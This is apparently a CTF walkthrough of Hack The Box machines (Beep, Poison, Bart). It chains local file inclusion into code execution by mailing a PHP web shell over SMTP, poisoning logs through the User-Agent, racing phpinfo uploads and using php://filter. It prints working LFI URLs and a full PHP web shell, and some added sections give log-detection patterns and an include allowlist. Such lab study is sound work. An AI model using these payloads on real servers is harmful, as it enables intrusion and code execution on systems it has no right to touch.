Turning LFI into RCE by sending emails via SMTP and other LFI’s

n00🔑
Jul 18, 2021

Hi, here we will look at a few things we can do with an LFI, and how combining them gets us RCE.

1. Turning LFI into RCE by sending emails via SMTP

Note: This scenario is in HTB Beep Machine. SMTP server is also running on the machine at port 25.

We start with a basic LFI

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

a. Identifying the user the current process is running as-

Basically, /proc/self/ represents the process that is reading /proc/self/. So if we open /proc/self/ from a C program, it refers to that program; if we do it from the shell, it is that shell. When it is read through the LFI, it is the web server process serving our request.

/proc/self/status
/proc/self/environ #for environment variables
/proc/net/dev #network interfaces
/proc/net/tcp #listening ports in hexadecimal
/proc/sys/kernel/hostname #viewing hostname
/proc/self/cmdline #getting the command which ran

If we read the contents of /proc/self/status, it outputs information about the process that is reading it. Let's see the output of this-

The interesting fields for us are the uid and gid of the process. Since we already have the output of /etc/passwd, we can use them to find the user this process is executing as.

We found the username asterisk
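The uid-to-username lookup described above, as an added example that is not part of the original post: it parses a constructed /proc/self/status dump and a constructed /etc/passwd excerpt (the uid/gid values and the asterisk line are assumptions, not the machine's real values).

```python
import re

# Constructed sample of /proc/self/status as it would be read through the LFI (trimmed).
SAMPLE_STATUS = """Name:\thttpd
State:\tS (sleeping)
Pid:\t2048
Uid:\t100\t100\t100\t100
Gid:\t101\t101\t101\t101
"""

# Constructed /etc/passwd excerpt; the asterisk line is the one we care about.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:/bin/bash
nobody:x:99:99:Nobody:/:/sbin/nologin
"""

def parse_ids(status_text):
    """Return (real uid, real gid) from a /proc/<pid>/status dump.

    The Uid:/Gid: lines list real, effective, saved and filesystem ids;
    the first column is the real id, which is what /etc/passwd records.
    """
    ids = {}
    for line in status_text.splitlines():
        m = re.match(r"^(Uid|Gid):\s+(\d+)", line)
        if m:
            ids[m.group(1)] = int(m.group(2))
    return ids["Uid"], ids["Gid"]

def resolve_user(passwd_text, uid):
    """Map a numeric uid to its login name using the passwd file contents."""
    for line in passwd_text.splitlines():
        fields = line.split(":")          # name:x:uid:gid:gecos:home:shell
        if len(fields) >= 7 and fields[2] == str(uid):
            return fields[0]
    return None

def process_owner(status_text, passwd_text):
    """Combine both files: (username, uid, gid) of the process that was read."""
    uid, gid = parse_ids(status_text)
    return resolve_user(passwd_text, uid), uid, gid

if __name__ == "__main__":
    print(process_owner(SAMPLE_STATUS, SAMPLE_PASSWD))
```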

b. Sending an email to the asterisk user with PHP code in the message-

i) Connecting to the SMTP server using telnet.

telnet 10.10.10.7 25

wait for the server banner

ii) Start a conversation with the server by identifying ourselves to the server-

EHLO golu@n00ky.cc

We can use any random email address. The server returns the commands available to use.

iii) We can verify that the user asterisk exists via the VRFY command-

VRFY asterisk@beep.localdomain

iv) Sending an email to asterisk@beep.localdomain-

MAIL FROM:golu@n00ky.cc

First, we specify the sender using MAIL FROM

RCPT TO:asterisk@beep.localdomain

Then we specify the recipient using RCPT TO

DATA

Enter DATA, then wait for the prompt telling you how to end the DATA.

<?php echo system($_REQUEST['cmd']);?>

.

After entering the message body, press <Enter> twice, then enter ‘.’ and press <Enter> again. The mail is now sent.

Note: Each <Enter> here means <CR><LF>

c. Getting RCE via LFI-

Checking the mbox file of the asterisk user via LFI-

/var/mail/asterisk

Observe the blank space in the output where our message body should appear. The included file is parsed as PHP, so our PHP tag is executed instead of being printed.

Now we just need to send our commands in the cmd parameter.

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//var/mail/asterisk%00&module=Accounts&action&cmd=id

Thanks for reading! I learned about this in the Beep walkthrough by IppSec. Hope you learned something new (at least I did :)

Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)

2. Turning LFI to RCE using log poisoning-

A) Note: This scenario is in HTB Poison Machine.

If we can get PHP code written into a web server's access log, and that log file can be included via the LFI, we can potentially get code execution. Let's see this in action.

From the Nmap scan, we determine the operating system is OpenBSD.

a. Finding the location of the log file-

Next we need to find the location of the log file. From the nmap output we know which web server is running, and a Google search gives the location of its access log (here /var/log/httpd-access.log).

Let's try to read this via LFI-

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log

Now we send our PHP payload in the User-Agent HTTP header. The web server writes it into this log file, and when the log file is included via the LFI, our payload is executed as PHP.

b. Sending the payload in the User-Agent header-

<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?php    if(isset($_GET['cmd']))    {        system($_GET['cmd']);    }?></pre></body><script>document.getElementById("cmd").focus();</script></html>

c. Getting RCE-

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id

B) Note: This scenario is in HTB BART Machine.

a) Here we start with a chat application that has functionality to log chats.

b) Looking at the JavaScript in the page source, we see that it makes a GET request to log.php, passing filename and username as parameters.

function saveChat() {
    // create a serialized object and send to log_chat.php. Once the XHR request is done, alert "Done"
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE) {
            alert(xhr.responseText);
        }
    }
    xhr.open('GET', 'http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey', true);
    xhr.send(null);
    alert("Done");
}

http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey

c) On checking the file name, we confirmed that the file is indeed created and that the User-Agent string is saved in it.

http://internal-01.bart.htb/log/log.txt

d) As you might have guessed, we can write our PHP code in the User-Agent string and store the file under any name we want.

e) So we modified the User-Agent string, replaced it with our web shell, and gave the file the name lol.php.
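Both log-poisoning scenarios (A and B) leave the same trace on the server side: a PHP open tag in a logged User-Agent, followed by a request that includes the log or mailbox. The detection below is an added example, not part of the original post; it parses combined-format access log lines constructed here (the IPs, timestamps and sizes are made up) and flags the indicators from this article.

```python
import re
from urllib.parse import unquote

# Constructed combined-format access log: entries 1-2 carry PHP tags in the
# User-Agent (log poisoning), 3-5 are LFI probes, 6 is benign traffic.
SAMPLE_LOG = r'''10.10.14.5 - - [18/Jul/2021:10:00:01 +0000] "GET /browse.php?file=ini.php HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
10.10.14.5 - - [18/Jul/2021:10:00:02 +0000] "GET /log/log.php?filename=lol.php&username=harvey HTTP/1.1" 200 12 "-" "<?php echo system($_REQUEST['cmd']);?>"
10.10.14.5 - - [18/Jul/2021:10:00:03 +0000] "GET /vtigercrm/graph.php?current_language=../../../../etc/passwd%00&module=Accounts HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.5 - - [18/Jul/2021:10:00:04 +0000] "GET /browse.php?file=/var/log/httpd-access.log&cmd=id HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.10.14.5 - - [18/Jul/2021:10:00:05 +0000] "GET /image.php?img=php://filter/convert.base64-encode/resource=db_conn.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"
192.0.2.10 - - [18/Jul/2021:10:00:06 +0000] "GET /index.php?page=home HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
'''

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A PHP open tag has no business in a User-Agent string.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

# Request-URI indicators, checked after percent-decoding (so %00 becomes NUL).
LFI_PATTERNS = [
    ("path traversal", re.compile(r"(\.\./){2,}")),
    ("null byte", re.compile(r"\x00")),
    ("php wrapper", re.compile(r"\b(php|data|expect|phar)://", re.IGNORECASE)),
    ("log or mailbox include", re.compile(r"/var/(log|mail)/")),
]

def inspect(line):
    """Return a finding record for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    if PHP_TAG.search(m["ua"]):
        findings.append("php tag in User-Agent")
    uri = unquote(m["uri"])
    findings += [name for name, pat in LFI_PATTERNS if pat.search(uri)]
    return {"ip": m["ip"], "uri": m["uri"], "findings": findings}

def scan(log_text):
    """Return only the lines that triggered at least one indicator."""
    hits = (inspect(line) for line in log_text.splitlines())
    return [h for h in hits if h and h["findings"]]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["uri"], ", ".join(hit["findings"]))
```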

Thanks For reading!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

3. Turning LFI to RCE using phpinfo to upload PHP code-

Note: This scenario is in HTB Poison Machine.

http://10.10.10.84/phpinfo.php

If the file_uploads option is enabled, we can upload a file via a POST request to phpinfo.php. PHP deletes this temporary upload as soon as the request finishes, so we need to win a race condition to include it via the LFI before it is removed. More info can be found in the PDF below.

https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf

python phpinfolfi.py 10.10.10.84 80 100

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Using PHP Filters in LFI:

For reading files we can use the plain filter.

For reading source code we can use the base64-encode filter, which returns the PHP source encoded instead of executing it.

http://10.129.89.85/image.php?img=php://filter/convert.base64-encode/resource=db_conn.php
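Every technique on this page starts from an include whose path is built from a request parameter. The check below is an added example of the fix, not code from any of the applications mentioned; it assumes a constructed web root and language directory (the real layouts are not known from the article) and refuses each payload shown above while still serving an allowlisted language file.

```python
import os
import re

# Constructed layout; the real paths of the vulnerable apps are not known
# from the article. realpath() is applied so a symlinked root compares equal.
WEB_ROOT = os.path.realpath("/var/www/html")
LANG_DIR = os.path.join(WEB_ROOT, "vtigercrm", "languages")

# Allowlist of language files the include is permitted to load.
ALLOWED_LANGUAGES = {"en_us", "de_de", "fr_fr"}

def resolve_language_include(user_value):
    """Map the current_language parameter to a safe path, or None to refuse.

    Each check closes one trick from the article: %00 truncation, ../
    traversal to /etc/passwd or /var/mail, absolute log paths, and php://
    stream wrappers. The allowlist alone makes all of them moot; the realpath
    comparison is kept as a second line of defence.
    """
    if not isinstance(user_value, str) or "\x00" in user_value:
        return None                       # null-byte truncation attempts
    if "://" in user_value or user_value.startswith(("/", "\\")):
        return None                       # stream wrappers, absolute paths
    if not re.fullmatch(r"[a-z]{2}_[a-z]{2}", user_value):
        return None                       # anything that is not a language tag
    if user_value not in ALLOWED_LANGUAGES:
        return None                       # well-formed but unknown tag
    path = os.path.realpath(os.path.join(LANG_DIR, user_value + ".php"))
    if os.path.commonpath([path, LANG_DIR]) != LANG_DIR:
        return None                       # escaped the language directory
    return path
```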

Thanks For reading!
